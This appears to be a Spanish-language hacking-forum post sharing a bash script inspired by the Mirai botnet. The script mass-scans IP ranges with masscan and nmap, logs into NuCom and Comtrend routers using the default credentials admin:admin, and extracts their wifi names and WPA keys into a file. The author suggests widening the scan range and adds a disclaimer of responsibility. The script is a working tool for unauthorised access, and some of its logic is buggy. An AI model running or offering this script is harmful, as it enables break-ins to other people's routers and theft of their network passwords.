Bienvenidos al nuevo foro de hackplayers. En caso de encontrarse cualquier tipo de error, contacte con cualquier administrador por mensaje privado.
Recuerda que, para incrementar tu privacidad, tambien puedes acceder al foro usando el dominio forohpysho2t5mjs.onion de la red tor.

routers con credenciales por defecto

Como primer post, omitiendo la presentacion, claro esta, quiero compartir este script en bash.
La idea me surgio a partir de la importancia que estan tomando el tema IoT y la botnet Mirai.
Comenze comprobando mi router, y poco a poco fui ampliando el rango de IP's.
como se puede apreciar es un "trabajo" de fin de semana, es muy mejorable, principalmente la salida.
Para los mas nuevos en el OS linux, daros unos consejos. ejecutar como root, los archivos deben existir, masscan, nmap y curl crean el archivo de salida pero los otros no seran creados. (micro_httpd.txt, Comtrend.txt, NuCom.txt, CALVES.txt).

Si cambiamos el rango de escaneo de masscan, podemos aumentar los resultados.

Quiero decir que eludo cualquier responsabilidad sobre el uso inadecuado de este codigo.

un saludo y no ser malos.

#!/bin/bash

masscan 192.168.1.0/24  -p80 --open-only --rate=1000 | awk '{print$6}' > ./output/ip_activas.txt

nmap -iL ./output/ip_activas.txt -p 80 -sV -sS -vv -Pn -T5 -oG - | grep 'open' | grep -v 'tcpwrapped' > ./output/80_open.txt

cat 80_open.txt | grep 'micro_httpd' | awk '{print$2}' >> micro_httpd.txt
for line in $(cat micro_httpd.txt)
do
    timeout 5 curl -sL -w "%{http_code}\n" $line -o /dev/null && echo $line  
    if [ code = 401  ]
    then
        echo $line >> Comtrend.txt
    else

        echo $line >> NuCom.txt
    fi
done


#login NuCom.txt
for IP in $(cat NuCom.txt)
do
    var=$(timeout 5 curl -sL -w "%{http_code}\n" "$IP" -o /dev/null)    #si en 5 sg no da respuesta salta a otro
    if [ $var = 200 ]                            #si responde con 200, esta activo
    then
        echo -e "\e[1;36m"$IP"\e[0m"                    #imprime la ip
        curl -c cook "http://"$IP"/login.cgi?username=admin&psd=admin" -o /dev/null            #crea/captura coolie
        curl -b cook "http://"$IP"/wlsecurity.html"  | grep -e "<option value='0'>" -e "wpaPskKey" >> CALVES.txt    #usa cookie para extraer essid y pass
    fi
done

#login comtrend
for line in $(cat listaIP.txt)

do
    timeout  5 curl -u admin:admin "$line"/wlsecurity.html | grep -e "<option value='0'>" -e "var wpaPskKey =" && echo -e "\e[1;36m$line\e[0m" 
done

Accede o Regístrate para comentar.